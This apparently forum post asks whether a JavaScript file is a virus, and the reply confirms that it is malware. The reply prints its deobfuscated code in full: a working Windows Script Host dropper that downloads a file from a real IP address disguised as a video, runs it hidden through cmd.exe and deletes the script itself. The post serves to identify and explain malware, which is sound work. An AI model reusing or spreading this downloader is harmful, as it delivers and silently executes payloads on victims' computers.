Is this a Javascript virus?

It most certainly is malware. It uses ActiveX to open up a shell with cmd.exe. This is the deobfuscated version:

function zQlMdib() {
    var asupcI = new ActiveXObject("MSXML2.XMLHTTP");
    asupcI['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    var OnvPPuGD = WScript['ScriptFullName'];
    asupcI['send']();
    if (asupcI['Status'] == 200) {
        var Bz = new ActiveXObject("Scripting.FileSystemObject");
        var mEadcyX = new ActiveXObject("ADODB.Stream");
        var zpfPsOb = Bz['GetSpecialFolder'](2) + '\' + Bz['GetTempName']();
        mEadcyX['Open']();
        mEadcyX['Type'] = 1;
        var oMod = new ActiveXObject("WScript.Shell");
        mEadcyX['Write'](asupcI['ResponseBody']);
        mEadcyX['Position'] = 0;
        mEadcyX['SaveToFile'](zpfPsOb);
        mEadcyX['Close']();
        oMod['run']('cmd.exe /c ' + zpfPsOb, 0);
    }
    Bz['deleteFile'](OnvPPuGD);
}

Here is the analysis of the payload on Malwr:

https://malwr.com/analysis/MGI0ZGIwNjNjMjlhNGM0YWE1ZTA5ZDgyYmNiZjRmMjE/

Is this a Javascript virus?

Tags:

Javascript

Virus

Malware

Related

Recent Posts